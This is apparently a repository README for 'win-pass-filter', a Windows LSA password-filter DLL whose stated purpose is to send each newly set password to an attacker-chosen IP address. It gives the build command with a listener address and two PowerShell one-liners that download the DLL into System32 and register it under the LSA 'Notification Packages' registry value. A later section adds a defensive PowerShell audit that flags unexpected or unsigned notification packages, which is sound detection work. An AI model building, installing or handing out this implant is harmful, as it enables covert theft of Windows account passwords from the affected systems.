Files of check-in [0c34949399] in the top-level directory
win-pass-filter
stolen from https://github.com/iDigitalFlame/redteam-tools
This is a Windows LSA password filter that sends the new password to an IP address of your choosing.
Build
Simply build for Windows with CGO enabled and the appropriate receiver listening port.
GOOS=windows CGO_ENABLED=1 go build -v -x -o filter.dll -buildmode=c-shared -ldflags '-X main.remote=192.168.0.100:4444'
You'll need MinGW or another proper C compiler that can build Windows binaries.
Try my brimstone/golang docker image.
Install
Copy the filter.dll to somewhere like c:\windows\system32\idk.dll and
install with PowerShell:
powershell -com "function install{Param([string]$u,[string]$a);$b=New-Object System.Net.WebClient;$b.DownloadFile($u, 'C:\Windows\system32\'+$a+'.dll');$l='HKLM:\System\CurrentControlSet\Control\Lsa';$n='Notification Packages';$c=(Get-ItemProperty $l -Name $n).$n; Set-ItemProperty $l -Name $n -Value ""$c`r`n$a""}"
or
powershell -com "$a='idk';$k='SYSTEM\CurrentControlSet\Control\LSA';$v='Notification Packages';$reg=[Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('LocalMachine','localhost');$key=$reg.OpenSubKey($k,$true);$arr=$key.GetValue($v);$arr=@($arr);if($arr -notcontains $a){$arr+=$a};$key.SetValue($v,[string[]]$arr,'MultiString')"
If you change the name of the DLL in c:\windows\system32, then also update the
$a variable.
Reboot when finished.
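
Because installation comes down to one extra entry in the `Notification Packages` value plus a DLL in System32, a defender can audit exactly those two things. The following is an added example, not part of this repository: the function name and the baseline list (`scecli`, `rassfm`) are assumptions to adjust per build.

```powershell
# Added example: audit the LSA "Notification Packages" value for unexpected password filters.
# Assumption: $Baseline lists the package names expected on this host; adjust it per build.
$Baseline = @('scecli', 'rassfm')

function Get-LsaNotificationPackageAudit {
    param(
        [string[]]$Expected = $Baseline,
        [string]$LsaKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
    )
    $valueName = 'Notification Packages'
    # REG_MULTI_SZ is returned as a string array; split embedded newlines and drop blanks,
    # since a value written as one string with CR/LF separators would otherwise hide an entry.
    $raw = @((Get-ItemProperty -Path $LsaKey -Name $valueName).$valueName)
    $packages = $raw | ForEach-Object { $_ -split "`r?`n" } |
        ForEach-Object { $_.Trim() } | Where-Object { $_ }

    foreach ($name in $packages) {
        # Each entry names a DLL (without extension) that is expected in System32.
        $dll    = Join-Path $env:SystemRoot "System32\$name.dll"
        $exists = Test-Path -LiteralPath $dll
        $sig    = if ($exists) { Get-AuthenticodeSignature -LiteralPath $dll } else { $null }
        $file   = if ($exists) { Get-Item -LiteralPath $dll } else { $null }

        [pscustomobject]@{
            Package    = $name
            Path       = $dll
            Exists     = $exists
            InBaseline = $Expected -contains $name   # case-insensitive match
            Signature  = if ($sig) { "$($sig.Status)" } else { 'n/a' }
            Signer     = if ($sig -and $sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { '' }
            Modified   = if ($file) { $file.LastWriteTimeUtc } else { $null }
            Sha256     = if ($exists) { (Get-FileHash -LiteralPath $dll -Algorithm SHA256).Hash } else { '' }
        }
    }
}

$report = Get-LsaNotificationPackageAudit
$report | Format-Table Package, InBaseline, Exists, Signature, Modified -AutoSize

# Anything outside the baseline, or present but not validly signed, needs investigation.
$suspect = $report | Where-Object { -not $_.InBaseline -or ($_.Exists -and $_.Signature -ne 'Valid') }
if ($suspect) {
    Write-Warning "Unexpected or unsigned LSA notification package(s) found:"
    $suspect | Format-List Package, Path, Signature, Signer, Modified, Sha256
}
```

An entry that is off-baseline, unsigned, or recently modified is the trace the install steps above leave behind; alerting on writes to this registry value catches the change before the reboot that loads the DLL.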